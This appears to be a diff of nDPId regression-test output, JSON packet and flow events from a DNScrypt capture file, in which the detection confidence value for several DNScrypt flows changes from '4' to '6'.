02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":946739305155,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739305155,"pkt":"REREREREZmZmZmZmCABFAAXcU1cgAL0RcE0KAAABizvIdJLbAbsGBNikc5ABAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":37595,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":37595,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":108,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739305155} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":108,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739305155,"pkt":"REREREREZmZmZmZmCABFAABQU1cAub0RlSAKAAABizvIdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59194,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":946739305155,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739305155,"pkt":"REREREREZmZmZmZmCABFAAXcU1ggAL0RcEwKAAABizvIdOc6AbsGBIRDc5IBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59194,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59194,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":110,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739305155} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":110,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739305155,"pkt":"REREREREZmZmZmZmCABFAABQU1gAub0RlR8KAAABizvIdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":946739305187,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":946739305187,"pkt":"ZmZmZmZmRERERERECABFAADSF51AADcRFxKLO8h0CgAAAQG76FQAvuw2c5WBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABwAwAEAABAABwgAB9fEROU0MAAgAABjDMcMbz7yA0RLegztcBfq7VeYHKBaMLey+aMNVSTMo4Qj51\/gmF1JL4mny7Kl7CHKqU1ouuslp1lX1chQTTD+JLJw323p3g\/i9lq2cywGbzFxjIXwRFrAIdM6Cq64tY4ksnDfbeneAAAAABX1N7RV9UzMU="} @@ -237,27 +237,27 @@ 00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":946739305191,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":946739305191,"pkt":"ZmZmZmZmRERERERECABFAADSF6FAADcRFw6LO8h0CgAAAQG7qnEAviobc5SBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABwAwAEAABAABwgAB9fEROU0MAAgAABjDMcMbz7yA0RLegztcBfq7VeYHKBaMLey+aMNVSTMo4Qj51\/gmF1JL4mny7Kl7CHKqU1ouuslp1lX1chQTTD+JLJw323p3g\/i9lq2cywGbzFxjIXwRFrAIdM6Cq64tY4ksnDfbeneAAAAABX1N7RV9UzMU="} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":115,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":47865,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":946739305192,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739305192,"pkt":"REREREREZmZmZmZmCABFAAIcZYtAAL0RdE4KAAABwx5eHLr5IPsCCOQQMs4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVmZm11YwNuZXQAABAAAQAAAAAAAAAAAAHKAAwBxgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":47865,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":47865,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":116,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":33369,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":946739305192,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739305192,"pkt":"REREREREZmZmZmZmCABFAAXcZYwgAL0RkI0KAAABwx5eHIJZIPsGBDAsMssBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVmZm11YwNuZXQAABAAAQAAAAAAAAAAAAXGAAwFwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":33369,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":33369,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":34885,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":946739305192,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739305192,"pkt":"REREREREZmZmZmZmCABFAAIcZY1AAL0RdEwKAAABwx5eHIhFIPsCCOQQMswBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVmZm11YwNuZXQAABAAAQAAAAAAAAAAAAHKAAwBxgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":34885,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 